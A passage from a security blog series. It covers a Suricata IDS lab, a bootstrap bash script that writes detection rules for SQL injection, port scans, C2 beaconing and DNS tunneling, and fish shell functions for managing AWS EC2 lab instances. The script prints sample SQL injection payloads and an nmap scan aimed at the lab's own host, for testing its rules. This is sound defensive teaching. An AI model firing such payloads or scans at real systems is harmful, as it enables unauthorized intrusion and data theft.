class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>systemctl restart suricata <span class="nb">sudo truncate</span> <span class="nt">-s</span> 0 /var/log/suricata/fast.log <span class="nb">sudo cat</span> /var/log/suricata/fast.log </code></pre> </div> <p>Since there was no output of "Possible C2 Beaconing Detected" the above tactic worked.</p> <h3> Exercise 4 </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Behavior</th> <th>Answer</th> </tr> </thead> <tbody> <tr> <td>Only fires after 5 matching packets from the same source in 10 seconds</td> <td><code>count 5,seconds 10</code></td> </tr> <tr> <td>Makes string matching case-insensitive</td> <td><code>nocase</code></td> </tr> <tr> <td>Restricts the rule to outbound traffic from your subnet</td> <td><code>pass tcp $HOME_NET any -&gt; any any</code></td> </tr> <tr> <td>Ensures a second content match starts immediately after the first with zero bytes between them</td> <td><code>distance:0</code></td> </tr> <tr> <td>Matches UDP packets larger than 200 bytes</td> <td><code>alert udp any any -&gt; any 53 (...dsize:&gt;200)</code></td> </tr> <tr> <td>Only applies to established TCP connections flowing toward the server</td> <td><code>flow:to_server,established</code></td> </tr> <tr> <td>Allows matching traffic to pass without triggering any alert rules below it</td> <td>Place a rule using the <code>pass</code> keyword at the top of the rules file</td> </tr> </tbody> </table></div> <h3> Exercise 5 </h3> <p><strong>Part 1 — 22 sources available:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@ip-172-31-24-247:~# suricata-update list-sources | <span class="nb">grep</span> <span class="nt">-i</span> <span class="s2">"Name"</span> Name: et/open Name: et/pro Name: oisf/trafficid Name: scwx/enhanced Name: scwx/malware Name: scwx/security Name: abuse.ch/sslbl-blacklist Name: abuse.ch/sslbl-ja3 Name: abuse.ch/feodotracker Name: abuse.ch/urlhaus Name: etnetera/aggressive Name: tgreen/hunting Name: stamus/lateral Name: stamus/nrd-30-open Name: stamus/nrd-14-open Name: stamus/nrd-entropy-30-open Name: stamus/nrd-entropy-14-open Name: stamus/nrd-phishing-30-open Name: stamus/nrd-phishing-14-open Name: pawpatrules Name: ptrules/open Name: aleksibovellan/nmap </code></pre> </div> <p><strong>Part 4 — Rule count after enabling ET:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@ip-172-31-24-247:~# <span class="nb">sudo grep</span> <span class="s2">"signatures processed"</span> /var/log/suricata/suricata.log | <span class="nb">tail</span> <span class="nt">-1</span> <span class="o">[</span>875 - Suricata-Main] 2026-03-21 18:31:15 Info: detect: 6 signatures processed. </code></pre> </div> <p><strong>Part 5 — ET SQL injection rules:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>root@ip-172-31-24-247:~# <span class="nb">grep</span> <span class="nt">-i</span> <span class="s2">"sql injection"</span> /var/lib/suricata/rules/suricata.rules | <span class="nb">wc</span> <span class="nt">-l</span> 4361 </code></pre> </div> <p>ET has 4,361 SQL injection rules compared to the 2 written in this post.</p> <p><strong>Reflection:</strong></p> <p>The first consequence of using a community ruleset is that it becomes difficult, if not impossible, for each individual to audit and verify the correctness of all rules. The ET ruleset alone has 4,361 SQL injection rules — which cannot be audited by one person in a day. The benefit is that one can rely on others for coverage, but if the ruleset is too large the user must question whether that person can be trusted to devise a secure, responsible ruleset. This is a reminder of Thompson's <em>Reflections on Trusting Trust</em> — at some point you are trusting the compiler, the ruleset author, or the package maintainer.</p> <p>The alternative is to build your own rules from scratch — but achieving comprehensive coverage takes far more time than using a community ruleset.</p> <h3> Replace Snapshots with a <a href="https://github.com/fosres/SecEng-Exercises/blob/main/aws/suricata/bootstrap_suricata.sh" rel="noopener noreferrer">Simple BASH Script</a> </h3> <p>I am aware I said one can store a snapshot and restore the snapshot later to save progress for this lab. This is a good idea while doing the lab the first time. If one wants to revisit the state of the EC2 environment after they complete the lab a cheaper and more efficient option is to simply launch a fresh, vanilla EC2 instance and run the following BASH script. It will install <code>suricata</code> for you in the EC2 instance and store and save the correct <code>suricata</code> rules--allowing you to test if the <code>suricata</code> rules are effective. You won't need to any longer store snapshots once you can run and test the following BASH script:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c">#!/usr/bin/env bash</span> <span class="c"># ============================================================</span> <span class="c"># Suricata IDS Lab — Bootstrap Script</span> <span class="c"># Run this inside a fresh lab-create instance to recreate</span> <span class="c"># the full Suricata lab setup from Week 9.</span> <span class="c">#</span> <span class="c"># Usage:</span> <span class="c"># lab-connect (connect to fresh instance via SSM)</span> <span class="c"># sudo bash bootstrap_suricata.sh</span> <span class="c">#</span> <span class="c"># What this does:</span> <span class="c"># 1. Installs Suricata 7.x from the official OISF PPA</span> <span class="c"># 2. Installs nginx as the HTTP target for SQLi tests</span> <span class="c"># 3. Installs nmap and dnsutils for testing rules</span> <span class="c"># 4. Configures suricata.yaml (HOME_NET, af-packet, rule-files)</span> <span class="c"># 5. Writes custom.rules with all 7 detection rules</span> <span class="c"># 6. Validates config and starts Suricata</span> <span class="c"># 7. Prints verification output</span> <span class="c">#</span> <span class="c"># Prerequisites:</span> <span class="c"># - Debian 13 EC2 instance (lab-create)</span> <span class="c"># - Outbound internet access (security group allows egress)</span> <span class="c"># - Run as root (sudo)</span> <span class="c"># ============================================================</span> <span class="nb">set</span> <span class="nt">-euo</span> pipefail <span class="c"># ── Colours ──────────────────────────────────────────────────</span> <span class="nv">RED</span><span class="o">=</span><span class="s1">'\033[0;31m'</span> <span class="nv">GREEN</span><span class="o">=</span><span class="s1">'\033[0;32m'</span> <span class="nv">YELLOW</span><span class="o">=</span><span class="s1">'\033[1;33m'</span> <span class="nv">NC</span><span class="o">=</span><span class="s1">'\033[0m'</span> log<span class="o">()</span> <span class="o">{</span> <span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="k">${</span><span class="nv">GREEN</span><span class="k">}</span><span class="s2">[+]</span><span class="k">${</span><span class="nv">NC</span><span class="k">}</span><span class="s2"> </span><span class="nv">$1</span><span class="s2">"</span><span class="p">;</span> <span class="o">}</span> warn<span class="o">()</span> <span class="o">{</span> <span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="k">${</span><span class="nv">YELLOW</span><span class="k">}</span><span class="s2">[!]</span><span class="k">${</span><span class="nv">NC</span><span class="k">}</span><span class="s2"> </span><span class="nv">$1</span><span class="s2">"</span><span class="p">;</span> <span class="o">}</span> die<span class="o">()</span> <span class="o">{</span> <span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="k">${</span><span class="nv">RED</span><span class="k">}</span><span class="s2">[✗]</span><span class="k">${</span><span class="nv">NC</span><span class="k">}</span><span class="s2"> </span><span class="nv">$1</span><span class="s2">"</span> <span class="o">&gt;</span>&amp;2<span class="p">;</span> <span class="nb">exit </span>1<span class="p">;</span> <span class="o">}</span> <span class="c"># ── Must run as root ─────────────────────────────────────────</span> <span class="o">[[</span> <span class="nv">$EUID</span> <span class="nt">-eq</span> 0 <span class="o">]]</span> <span class="o">||</span> die <span class="s2">"Run as root: sudo bash </span><span class="nv">$0</span><span class="s2">"</span> <span class="c"># ── Detect network interface and subnet ──────────────────────</span> log <span class="s2">"Detecting network interface..."</span> <span class="nv">IFACE</span><span class="o">=</span><span class="si">$(</span>ip route | <span class="nb">awk</span> <span class="s1">'/default/ {print $5}'</span> | <span class="nb">head</span> <span class="nt">-1</span><span class="si">)</span> <span class="o">[[</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$IFACE</span><span class="s2">"</span> <span class="o">]]</span> <span class="o">||</span> die <span class="s2">"Could not detect network interface"</span> <span class="c"># Get the subnet in CIDR notation from the interface address</span> <span class="c"># e.g. inet 172.31.29.30/20 → calculate network address 172.31.16.0/20</span> <span class="nv">IFACE_CIDR</span><span class="o">=</span><span class="si">$(</span>ip addr show <span class="s2">"</span><span class="nv">$IFACE</span><span class="s2">"</span> | <span class="nb">grep</span> <span class="s2">"inet "</span> | <span class="nb">awk</span> <span class="s1">'{print $2}'</span> | <span class="nb">head</span> <span class="nt">-1</span><span class="si">)</span> <span class="o">[[</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$IFACE_CIDR</span><span class="s2">"</span> <span class="o">]]</span> <span class="o">||</span> die <span class="s2">"Could not detect IP for </span><span class="nv">$IFACE</span><span class="s2">"</span> <span class="nv">SUBNET</span><span class="o">=</span><span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">" import ipaddress net = ipaddress.IPv4Interface('</span><span class="nv">$IFACE_CIDR</span><span class="s2">').network print(str(net)) "</span><span class="si">)</span> <span class="o">[[</span> <span class="nt">-n</span> <span class="s2">"</span><span class="nv">$SUBNET</span><span class="s2">"</span> <span class="o">]]</span> <span class="o">||</span> die <span class="s2">"Could not calculate subnet from </span><span class="nv">$IFACE_CIDR</span><span class="s2">"</span> log <span class="s2">"Interface: </span><span class="nv">$IFACE</span><span class="s2">"</span> log <span class="s2">"Subnet (HOME_NET): </span><span class="nv">$SUBNET</span><span class="s2">"</span> <span class="c"># ── Install dependencies ──────────────────────────────────────</span> log <span class="s2">"Updating package lists..."</span> apt-get update <span class="nt">-y</span> <span class="nt">-q</span> log <span class="s2">"Installing prerequisites..."</span> apt-get <span class="nb">install</span> <span class="nt">-y</span> <span class="nt">-q</span> <span class="se">\</span> curl <span class="se">\</span> wget <span class="se">\</span> gnupg <span class="se">\</span> lsb-release <span class="se">\</span> nginx <span class="se">\</span> nmap <span class="se">\</span> dnsutils <span class="se">\</span> tcpdump <span class="se">\</span> python3 <span class="c"># ── Install Suricata from Debian backports ────────────────────</span> log <span class="s2">"Installing Suricata..."</span> <span class="c"># Suricata is available directly in Debian trixie (13) repos</span> apt-get <span class="nb">install</span> <span class="nt">-y</span> <span class="nt">-q</span> suricata <span class="o">||</span> die <span class="s2">"Suricata install failed — check apt output above"</span> <span class="c"># ── Create custom rules directory ────────────────────────────</span> log <span class="s2">"Creating rules directory..."</span> <span class="nb">mkdir</span> <span class="nt">-p</span> /etc/suricata/rules <span class="c"># ── Write custom.rules ───────────────────────────────────────</span> log <span class="s2">"Writing custom.rules..."</span> <span class="nb">cat</span> <span class="o">&gt;</span> /etc/suricata/rules/custom.rules <span class="o">&lt;&lt;</span> <span class="sh">'</span><span class="no">RULES</span><span class="sh">' # ============================================================ # Suricata Custom Rules — Week 9 Lab # Pass rules must come FIRST — Suricata processes top to bottom # ============================================================ # ── Pass rules (whitelist legitimate AWS traffic) ──────────── pass http </span><span class="nv">$HOME_NET</span><span class="sh"> any -&gt; 169.254.169.254 any (msg:"IMDS traffic - whitelist"; sid:9000010; rev:1;) pass tcp </span><span class="nv">$HOME_NET</span><span class="sh"> any -&gt; any 443 (msg:"AWS HTTPS services whitelist"; sid:9000011; rev:1;) # ── Alert rules ────────────────────────────────────────────── alert tcp any any -&gt; </span><span class="nv">$HOME_NET</span><span class="sh"> any (msg:"SQL Injection UNION SELECT Attempt"; content:"UNION"; nocase; content:"SELECT"; nocase; sid:9000001; rev:4;) alert tcp any any -&gt; </span><span class="nv">$HOME_NET</span><span class="sh"> 80 (msg:"SQL Injection Comment Bypass Attempt"; content:"OR"; nocase; content:"="; nocase; sid:9000002; rev:6;) alert tcp any any -&gt; </span><span class="nv">$HOME_NET</span><span class="sh"> any (msg:"Possible Port Scan Detected"; flags:S; threshold:type threshold,track by_src,count 5,seconds 10; sid:9000003; rev:3;) # alert tcp </span><span class="nv">$HOME_NET</span><span class="sh"> any -&gt; any any (msg:"Possible C2 Beaconing Detected"; flow:to_server,established; threshold:type both,track by_src,count 10,seconds 60; sid:9000004; rev:2;) alert udp any any -&gt; any 53 (msg:"Possible DNS Tunneling - Large Query"; dsize:&gt;200; sid:9000005; rev:2;) </span><span class="no">RULES </span>log <span class="s2">"custom.rules written (C2 rule commented out — re-enable after whitelisting all AWS endpoints)"</span> <span class="c"># ── Configure suricata.yaml ───────────────────────────────────</span> log <span class="s2">"Configuring suricata.yaml..."</span> <span class="c"># Set HOME_NET to the detected subnet</span> <span class="nb">sed</span> <span class="nt">-i</span> <span class="s2">"s|HOME_NET: </span><span class="se">\"</span><span class="s2">.*</span><span class="se">\"</span><span class="s2">|HOME_NET: </span><span class="se">\"</span><span class="s2">[</span><span class="nv">$SUBNET</span><span class="s2">]</span><span class="se">\"</span><span class="s2">|"</span> /etc/suricata/suricata.yaml <span class="c"># Set af-packet to monitor both enX0/eth0 and lo</span> python3 - <span class="o">&lt;&lt;</span> <span class="no">PYEOF</span><span class="sh"> import re with open('/etc/suricata/suricata.yaml', 'r') as f: content = f.read() # Replace af-packet interface section iface = "</span><span class="nv">$IFACE</span><span class="sh">" new_afpacket = f"""af-packet: - interface: {iface} - interface: lo """ content = re.sub( r'af-packet:.*?(?=</span><span class="se">\n\S</span><span class="sh">|</span><span class="se">\Z</span><span class="sh">)', new_afpacket, content, flags=re.DOTALL ) with open('/etc/suricata/suricata.yaml', 'w') as f: f.write(content) print("af-packet configured") </span><span class="no">PYEOF </span><span class="c"># Set rule-files to only load custom.rules</span> python3 - <span class="o">&lt;&lt;</span> <span class="no">PYEOF</span><span class="sh"> import re with open('/etc/suricata/suricata.yaml', 'r') as f: content = f.read() content = re.sub( r'rule-files:.*?(?=</span><span class="se">\n\S</span><span class="sh">|</span><span class="se">\Z</span><span class="sh">)', 'rule-files:</span><span class="se">\n</span><span class="sh"> - /etc/suricata/rules/custom.rules</span><span class="se">\n</span><span class="sh">', content, flags=re.DOTALL ) with open('/etc/suricata/suricata.yaml', 'w') as f: f.write(content) print("rule-files configured") </span><span class="no">PYEOF </span><span class="c"># ── Enable and start nginx ────────────────────────────────────</span> log <span class="s2">"Starting nginx (HTTP target for SQLi tests)..."</span> systemctl <span class="nb">enable </span>nginx <span class="nt">-q</span> systemctl start nginx <span class="c"># ── Validate Suricata config ──────────────────────────────────</span> log <span class="s2">"Validating Suricata configuration..."</span> suricata <span class="nt">-T</span> <span class="nt">-c</span> /etc/suricata/suricata.yaml <span class="nt">-v</span> 2&gt;&amp;1 | <span class="nb">grep</span> <span class="nt">-E</span> <span class="s2">"Configuration|Error|Warning|rules"</span> <span class="o">||</span> <span class="nb">true</span> <span class="c"># ── Start Suricata ────────────────────────────────────────────</span> log <span class="s2">"Starting Suricata..."</span> systemctl <span class="nb">enable </span>suricata <span class="nt">-q</span> systemctl restart suricata <span class="nb">sleep </span>5 <span class="c"># ── Verify ───────────────────────────────────────────────────</span> log <span class="s2">"Verifying Suricata is running..."</span> systemctl is-active suricata <span class="o">||</span> die <span class="s2">"Suricata failed to start — check: journalctl -u suricata"</span> log <span class="s2">"Checking rules loaded..."</span> <span class="nb">sleep </span>3 <span class="nv">SIGS</span><span class="o">=</span><span class="si">$(</span><span class="nb">grep</span> <span class="s2">"signatures processed"</span> /var/log/suricata/suricata.log | <span class="nb">tail</span> <span class="nt">-1</span><span class="si">)</span> <span class="nb">echo</span> <span class="s2">" </span><span class="nv">$SIGS</span><span class="s2">"</span> <span class="c"># ── Print instance IP ─────────────────────────────────────────</span> <span class="nv">INSTANCE_IP</span><span class="o">=</span><span class="si">$(</span>ip addr show <span class="s2">"</span><span class="nv">$IFACE</span><span class="s2">"</span> | <span class="nb">grep</span> <span class="s2">"inet "</span> | <span class="nb">awk</span> <span class="s1">'{print $2}'</span> | <span class="nb">cut</span> <span class="nt">-d</span>/ <span class="nt">-f1</span><span class="si">)</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="k">${</span><span class="nv">GREEN</span><span class="k">}</span><span class="s2">============================================================</span><span class="k">${</span><span class="nv">NC</span><span class="k">}</span><span class="s2">"</span> <span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="k">${</span><span class="nv">GREEN</span><span class="k">}</span><span class="s2"> Suricata Lab Ready</span><span class="k">${</span><span class="nv">NC</span><span class="k">}</span><span class="s2">"</span> <span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="k">${</span><span class="nv">GREEN</span><span class="k">}</span><span class="s2">============================================================</span><span class="k">${</span><span class="nv">NC</span><span class="k">}</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">" Interface: </span><span class="nv">$IFACE</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">" HOME_NET: </span><span class="nv">$SUBNET</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">" Instance IP: </span><span class="nv">$INSTANCE_IP</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">" fast.log: /var/log/suricata/fast.log"</span> <span class="nb">echo</span> <span class="s2">" custom.rules: /etc/suricata/rules/custom.rules"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">" Test commands:"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">" Rule 1 (SQLi UNION):"</span> <span class="nb">echo</span> <span class="s2">" curl -v -G </span><span class="se">\"</span><span class="s2">http://</span><span class="nv">$INSTANCE_IP</span><span class="s2">/</span><span class="se">\"</span><span class="s2"> --data-urlencode </span><span class="se">\"</span><span class="s2">id=1' UNION SELECT username,password FROM users--</span><span class="se">\"</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">" Rule 2 (SQLi OR):"</span> <span class="nb">echo</span> <span class="s2">" curl -v </span><span class="se">\"</span><span class="s2">http://</span><span class="nv">$INSTANCE_IP</span><span class="s2">/?id=1%27%20OR%201%3D1--</span><span class="se">\"</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">" Rule 3 (Port scan):"</span> <span class="nb">echo</span> <span class="s2">" sudo nmap -sS --max-rate 10 </span><span class="nv">$INSTANCE_IP</span><span class="s2">"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">" Rule 5 (DNS tunneling):"</span> <span class="nb">echo</span> <span class="s2">" dig </span><span class="se">\$</span><span class="s2">(python3 -c </span><span class="se">\"</span><span class="s2">print('A'*60 + '.' + 'B'*60 + '.' + 'C'*60)</span><span class="se">\"</span><span class="s2">).google.com @8.8.8.8"</span> <span class="nb">echo</span> <span class="s2">""</span> <span class="nb">echo</span> <span class="s2">" Watch alerts:"</span> <span class="nb">echo</span> <span class="s2">" sudo tail -f /var/log/suricata/fast.log"</span> <span class="nb">echo</span> <span class="s2">""</span> </code></pre> </div> <p><em>Series: Security Engineering Interview Prep | Week 9 Part 2 | March 2026</em><br> <em>GitHub: <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">fosres/SecEng-Exercises</a></em></p> aws security devsecops tutorial fosres Sun, 15 Mar 2026 20:23:48 +0000 https://dev.to/fosres/fish-shell-functions-for-managing-aws-ec2-instances-save-progress-time-and-billing-1kbi https://dev.to/fosres/fish-shell-functions-for-managing-aws-ec2-instances-save-progress-time-and-billing-1kbi <blockquote> <p><strong>Prerequisites:</strong> This post assumes you have a working AWS lab with IAM Identity Center and SSM Session Manager configured. If you have not done that yet, start here first:</p> <p><strong>👉 <a href="https://dev.to/fosres/secure-aws-lab-setup-for-security-engineers-iam-identity-center-ssm-zero-open-ports-1hfn">Secure AWS Lab Setup for Security Engineers: IAM Identity Center + SSM + Zero Open Ports</a></strong></p> </blockquote> <p>If you find this useful, I'd really appreciate a ⭐ on my open source secure coding exercise repo — it helps a lot:</p> <p><a href="https://github.com/fosres/SecEng-Exercises" class="crayons-btn crayons-btn--primary" rel="noopener noreferrer">🌟 Star the SecEng-Exercises Repo on GitHub</a> </p> <p>Also — why do you read security engineering blog posts? One click helps me write better content:</p> <p><strong>👉 <a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">Take the poll</a></strong> (takes 10 seconds)</p> <h2> Introduction </h2> <p>Running a personal AWS security lab involves the same set of CLI operations over and over: launch an instance, connect to it, do some work, save your progress, and shut it down to avoid unnecessary billing. Without automation, each of these steps requires remembering long <code>aws ec2</code> commands with multiple flags.</p> <p>This post provides a complete set of fish shell functions that reduce all of that to single commands. They are designed specifically for the AWS lab exercises in this blog series and give you three practical benefits:</p> <p><strong>Save progress</strong> — <code>lab-snapshot</code> creates a full AMI snapshot of your running instance so you can terminate it and restore exactly where you left off next session. No reinstalling tools from scratch.</p> <p><strong>Save time</strong> — <code>lab-create</code> and <code>lab-restore</code> handle the full instance launch sequence automatically: create, wait for running state, wait for SSM Agent, and tell you when it is ready. One command instead of five.</p> <p><strong>Save billing</strong> — <code>lab-terminate</code> permanently deletes the instance so you pay nothing between sessions. Combined with snapshots, you get zero ongoing compute cost with full state preservation.</p> <p>To put the cost difference in perspective:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>State</th> <th>Monthly Cost</th> </tr> </thead> <tbody> <tr> <td>EC2 running 24/7 (t2.micro)</td> <td>~$8.35</td> </tr> <tr> <td>EC2 stopped (EBS volume persists)</td> <td>~$0.64</td> </tr> <tr> <td>AMI snapshot (used data only)</td> <td>~$0.10–0.15</td> </tr> <tr> <td>EC2 terminated, no snapshot</td> <td>$0.00</td> </tr> </tbody> </table></div> <p>A snapshot of a Debian 13 instance with Suricata installed uses roughly 2-3GB of actual data — AWS only charges for used data, not the full volume size. At $0.05/GB/month that comes to about $0.10-0.15/month. Compared to leaving the instance running at $8.35/month, snapshots are roughly <strong>60x cheaper</strong> while preserving your full environment between sessions.</p> <p>All functions are available to download from GitHub:</p> <p><strong>👉 <a href="https://github.com/fosres/SecEng-Exercises/tree/main/aws/functions" rel="noopener noreferrer">github.com/fosres/SecEng-Exercises/tree/main/aws/functions</a></strong></p> <h2> Setup </h2> <h3> Install Fish Shell </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Debian / Ubuntu</span> <span class="nb">sudo </span>apt <span class="nb">install </span>fish <span class="nt">-y</span> <span class="c"># Verify</span> fish <span class="nt">--version</span> </code></pre> </div> <h3> Create the Functions Directory </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">mkdir</span> <span class="nt">-p</span> ~/.config/fish/functions </code></pre> </div> <p>Fish loads functions automatically from this directory. Each function lives in its own <code>.fish</code> file named after the function. No <code>source</code> command needed — drop the file in and it is immediately available.</p> <h3> Set the Instance ID Universal Variable </h3> <p>All functions that operate on a running instance use <code>$INSTANCE_ID</code> — a fish universal variable that persists across all sessions permanently:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>set -U INSTANCE_ID "i-your_instance_id_here" </code></pre> </div> <p><code>set -U</code> means universal — it survives terminal restarts, new tabs, and reboots. <code>lab-create</code> and <code>lab-restore</code> update it automatically when launching a new instance so you rarely need to set it manually.</p> <h2> The Functions </h2> <h3> lab-login — Authenticate via IAM Identity Center </h3> <p>Run this at the start of every session. Opens a browser where you tap your YubiKey to issue 8-hour temporary credentials.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-login aws sso login --profile lab-sso end </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">$</span><span class="w"> </span>lab-login <span class="gp">#</span><span class="w"> </span>Browser opens → tap YubiKey → <span class="s2">"Your credentials have been shared successfully"</span> </code></pre> </div> <blockquote> <p><strong>Token expires after 8 hours.</strong> If any function returns <code>Token has expired and refresh failed</code> — run <code>lab-login</code> again.</p> </blockquote> <h3> lab-status — Check Instance State </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-status aws ec2 describe-instances --instance-ids $INSTANCE_ID \ --profile lab-sso \ --query "Reservations[0].Instances[0].State.Name" \ --output text end </code></pre> </div> <p>Returns: <code>running</code>, <code>stopped</code>, <code>terminated</code>, or <code>None</code>.</p> <blockquote> <p><strong><code>None</code> means the instance was terminated.</strong> Run <code>lab-create</code> or <code>lab-restore</code> to launch a new one.</p> </blockquote> <h3> lab-start — Start a Stopped Instance </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-start aws ec2 start-instances --instance-ids $INSTANCE_ID --profile lab-sso echo "Starting... wait 60 seconds" end </code></pre> </div> <p>Use this only if you chose <code>lab-stop</code> to pause billing rather than <code>lab-terminate</code>. A stopped instance still incurs EBS storage charges (~$0.08/GB/month).</p> <h3> lab-stop — Stop a Running Instance </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-stop aws ec2 stop-instances --instance-ids $INSTANCE_ID --profile lab-sso echo "Stopping..." end </code></pre> </div> <p>Pauses compute billing. The EBS volume persists with all data intact. Resume with <code>lab-start</code>.</p> <h3> lab-connect — Open a Shell on the Instance </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-connect aws ssm start-session --target $INSTANCE_ID --profile lab-sso end </code></pre> </div> <p>Opens a terminal session via SSM Session Manager — no SSH, no open ports, no key pair file required.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">$</span><span class="w"> </span>lab-connect <span class="go">Starting session with SessionId: your_username_here-... </span><span class="gp">$</span><span class="w"> </span><span class="nb">whoami</span> <span class="go">ssm-user </span></code></pre> </div> <h3> lab-terminate — Permanently Delete the Instance </h3> <p>Before running <code>lab-terminate</code>, always verify it is pointing at the right instance:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>echo $INSTANCE_ID # prints the instance ID it will terminate lab-status # confirms the instance is running </code></pre> </div> <p>Both should agree before proceeding.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-terminate echo "WARNING: This will permanently delete the instance and all data on it." echo "Instance: $INSTANCE_ID" read --prompt-str "Type YES to confirm: " confirm if test "$confirm" = "YES" aws ec2 terminate-instances \ --instance-ids $INSTANCE_ID --profile lab-sso echo "Instance terminated. Use lab-create to launch a fresh one." else echo "Cancelled." end end </code></pre> </div> <blockquote> <p>⚠️ <strong>Fish syntax bug:</strong> Use <code>--prompt-str</code> not <code>--prompt</code> for the <code>read</code> command. Using <code>--prompt</code> causes a syntax error that <strong>silently skips the confirmation</strong> and immediately terminates the instance.</p> </blockquote> <h3> lab-create — Launch a Fresh Instance from a Launch Template </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-create echo "Launching new suricata-ids-lab instance..." set new_id (aws ec2 run-instances \ --launch-template LaunchTemplateName=suricata-lab-template \ --tag-specifications "ResourceType=instance,Tags=[{Key=Name,Value=suricata-ids-lab}]" \ --profile lab-sso \ --query "Instances[0].InstanceId" \ --output text) if test -z "$new_id" echo "ERROR: Failed to launch instance." return 1 end echo "Instance launched: $new_id" echo "Updating INSTANCE_ID..." set -U INSTANCE_ID $new_id echo "Waiting for instance to reach running state..." aws ec2 wait instance-running \ --instance-ids $new_id \ --profile lab-sso echo "Instance is running." echo "Waiting 3 minutes for SSM Agent to initialize..." sleep 180 echo "Ready. Run lab-connect to start your session." end </code></pre> </div> <p>Launches a clean Debian 13 instance from the Launch Template. Automatically updates <code>$INSTANCE_ID</code>. The 3-minute wait allows the User Data script to install the SSM Agent on first boot.</p> <h2> Snapshot Functions </h2> <p>These functions let you save and restore instance state so you never lose progress between sessions.</p> <h3> lab-snapshot-list — List All Saved Snapshots </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-snapshot-list echo "Your saved AMIs:" aws ec2 describe-images \ --owners self \ --query "Images[*].[ImageId,Name,CreationDate]" \ --output table \ --profile lab-sso end </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight console"><code><span class="gp">$</span><span class="w"> </span>lab-snapshot-list <span class="go"> Your saved AMIs: +------------------------+---------------------------+----------------------+ | ami-0xxxxxxxxxxxxxxxxx | suricata_setup-2026-03-15 | 2026-03-15T12:00:00Z | +------------------------+---------------------------+----------------------+ </span></code></pre> </div> <h3> lab-snapshot — Save the Current Instance State </h3> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>function lab-snapshot echo "Your running instances:" aws ec2 describe-instances \ --filters "Name=instance-state-name,Values=running" \ --query "Reservations[*].Instances[*].[InstanceId,State.Name]" \ --output table \ --profile lab-sso read --prompt-str "Enter Instance ID to snapshot (i-...): " instance_id if test -z "$instance_id" echo "ERROR: No Instance ID entered. Cancelled." return 1 end read --prompt-str "Enter a name for this snapshot: " snapshot_name if test -z "$snapshot_name" echo "ERROR: No snapshot name entered. Cancelled." return 1 end # Auto-detect the root volume device name from the running instance set device_name (aws ec2 describe-instances \ --instance-ids $instance_id \ --query "Reservations[0].Instances[0].RootDeviceName" \ --output text \ --profile lab-sso) set today (date +%Y-%m-%d) echo "Creating encrypted snapshot of $instance_id..." set ami_id (aws ec2 create-image \ --instance-id $instance_id \ --name "$snapshot_name-$today" \ --description "Lab snapshot: $snapshot_name" \ --no-reboot \ --block-device-mappings "[{\"DeviceName\":\"$device_name\",\"Ebs\":{\"Encrypted\":true,\"DeleteOnTermination\":true}}]" \ --profile lab-sso \ --query "ImageId" \ --output text) if test -z "$ami_id" echo "ERROR: Failed to create snapshot." return 1 end echo "Snapshot created: $ami_id (encrypted)" echo "Waiting for snapshot to become available..." aws ec2 wait image-available \ --image-ids $ami_id \ --profile lab-sso echo "Snapshot is ready: $ami_id" echo "Use this ID with lab-restore to launch from this state." end </code></pre> </div> <p><strong><code>--no-reboot</code></strong> — takes the snapshot while the instance keeps running. You stay connected the whole time.</p> <p><strong>Encryption</strong> — snapshots are encrypted at rest using the AWS-managed EBS key (<code>aws/ebs</code>). No password, no key to manage — AWS handles decryption transparently when the instance boots from the snapshot. The device name is auto-detected from the running instance so the encryption flag always targets the correct volume.</p> <blockquote> <p>⏳ <strong>Expect to wait 3-5 minutes</strong> for the snapshot to complete. AWS is copying the entire EBS volume to 